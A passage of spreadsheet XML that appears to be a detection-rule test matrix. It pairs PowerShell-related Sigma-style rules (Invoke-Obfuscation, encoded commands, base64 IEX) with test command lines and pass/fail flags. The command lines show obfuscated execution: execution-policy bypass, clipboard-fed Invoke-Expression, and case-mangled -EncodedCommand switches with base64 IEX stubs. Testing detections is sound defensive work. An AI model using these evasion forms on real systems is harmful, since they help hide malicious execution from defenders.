      <c r="B4440" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4440" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4440" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4440" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F4440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4440" s="43" t="n"/>
      <c r="J4440" s="43" t="n"/>
      <c r="K4440" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4441" ht="15.75" customHeight="1" s="42">
      <c r="A4441" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4441" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4441" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4441" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4441" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F4441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4441" s="43" t="n"/>
      <c r="J4441" s="43" t="n"/>
      <c r="K4441" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4442" ht="15.75" customHeight="1" s="42">
      <c r="A4442" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4442" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4442" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4442" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4442" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -COMmanD "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F4442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4442" s="43" t="n"/>
      <c r="J4442" s="43" t="n"/>
      <c r="K4442" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4443" ht="15.75" customHeight="1" s="42">
      <c r="A4443" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4443" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4443" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4443" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4443" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ec" JABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4443" s="43" t="n"/>
      <c r="J4443" s="43" t="n"/>
      <c r="K4443" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4444" ht="15.75" customHeight="1" s="42">
      <c r="A4444" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4444" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4444" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4444" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4444" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4444" s="43" t="n"/>
      <c r="J4444" s="43" t="n"/>
      <c r="K4444" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4445" ht="15.75" customHeight="1" s="42">
      <c r="A4445" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4445" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4445" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4445" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4445" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"enc" IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4445" s="43" t="n"/>
      <c r="J4445" s="43" t="n"/>
      <c r="K4445" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4446" ht="15.75" customHeight="1" s="42">
      <c r="A4446" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4446" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4446" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4446" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4446" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNc IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4446" s="43" t="n"/>
      <c r="J4446" s="43" t="n"/>
      <c r="K4446" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4447" ht="15.75" customHeight="1" s="42">
      <c r="A4447" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4447" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4447" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4447" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4447" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enC IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4447" s="43" t="n"/>
      <c r="J4447" s="43" t="n"/>
      <c r="K4447" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4448" ht="15.75" customHeight="1" s="42">
      <c r="A4448" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4448" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4448" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4448" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4448" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENc IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F4448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4448" s="43" t="n"/>
      <c r="J4448" s="43" t="n"/>
      <c r="K4448" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4449" ht="15.75" customHeight="1" s="42">
      <c r="A4449" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4449" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4449" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4449" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4449" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F4449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4449" s="43" t="n"/>
      <c r="J4449" s="43" t="n"/>
      <c r="K4449" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4450" ht="15.75" customHeight="1" s="42">
      <c r="A4450" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4450" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C4450" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D4450" s="43" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E4450" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F4450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4450" s="43" t="n"/>
      <c r="J4450" s="43" t="n"/>
      <c r="K4450" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4451" ht="15.75" customHeight="1" s="42">
      <c r="A4451" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4451" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4451" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4451" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4451" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4451" s="43" t="n"/>
      <c r="J4451" s="43" t="n"/>
      <c r="K4451" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4452" ht="15.75" customHeight="1" s="42">
      <c r="A4452" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4452" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4452" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4452" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4452" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4452" s="43" t="n"/>
      <c r="J4452" s="43" t="n"/>
      <c r="K4452" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4453" ht="15.75" customHeight="1" s="42">
      <c r="A4453" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4453" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4453" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4453" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4453" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdeDCOmmaND aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4453" s="43" t="n"/>
      <c r="J4453" s="43" t="n"/>
      <c r="K4453" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4454" ht="15.75" customHeight="1" s="42">
      <c r="A4454" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4454" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4454" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4454" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4454" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enCoDeDcOMmanD aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4454" s="43" t="n"/>
      <c r="J4454" s="43" t="n"/>
      <c r="K4454" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4455" ht="15.75" customHeight="1" s="42">
      <c r="A4455" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4455" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4455" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4455" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4455" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENCOdeDCommAnd aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4455" s="43" t="n"/>
      <c r="J4455" s="43" t="n"/>
      <c r="K4455" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4456" ht="15.75" customHeight="1" s="42">
      <c r="A4456" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4456" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4456" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4456" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4456" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEdcOmMAND aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4456" s="43" t="n"/>
      <c r="J4456" s="43" t="n"/>
      <c r="K4456" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4457" ht="15.75" customHeight="1" s="42">
      <c r="A4457" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4457" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4457" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4457" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4457" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4457" s="43" t="n"/>
      <c r="J4457" s="43" t="n"/>
      <c r="K4457" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4458" ht="15.75" customHeight="1" s="42">
      <c r="A4458" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4458" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4458" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4458" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4458" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEdcommANd SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4458" s="43" t="n"/>
      <c r="J4458" s="43" t="n"/>
      <c r="K4458" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4459" ht="15.75" customHeight="1" s="42">
      <c r="A4459" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4459" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4459" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4459" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4459" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4459" s="43" t="n"/>
      <c r="J4459" s="43" t="n"/>
      <c r="K4459" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4460" ht="15.75" customHeight="1" s="42">
      <c r="A4460" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4460" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4460" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4460" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4460" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encodEdCommanD SQBgAEUAYABYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4460" s="43" t="n"/>
      <c r="J4460" s="43" t="n"/>
      <c r="K4460" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4461" ht="15.75" customHeight="1" s="42">
      <c r="A4461" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4461" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4461" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4461" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4461" s="43" t="n"/>
      <c r="J4461" s="43" t="n"/>
      <c r="K4461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4462" ht="15.75" customHeight="1" s="42">
      <c r="A4462" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4462" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4462" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4462" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4462" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4462" s="43" t="n"/>
      <c r="J4462" s="43" t="n"/>
      <c r="K4462" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4463" ht="15.75" customHeight="1" s="42">
      <c r="A4463" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4463" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4463" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4463" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4463" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enCODEdcoMMaNd SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4463" s="43" t="n"/>
      <c r="J4463" s="43" t="n"/>
      <c r="K4463" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4464" ht="15.75" customHeight="1" s="42">
      <c r="A4464" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4464" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4464" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4464" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4464" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4464" s="43" t="n"/>
      <c r="J4464" s="43" t="n"/>
      <c r="K4464" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4465" ht="15.75" customHeight="1" s="42">
      <c r="A4465" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4465" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4465" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4465" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4465" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enCodEDcOmMAnd SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4465" s="43" t="n"/>
      <c r="J4465" s="43" t="n"/>
      <c r="K4465" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4466" ht="15.75" customHeight="1" s="42">
      <c r="A4466" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4466" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4466" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4466" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4466" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDeDCommANd SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4466" s="43" t="n"/>
      <c r="J4466" s="43" t="n"/>
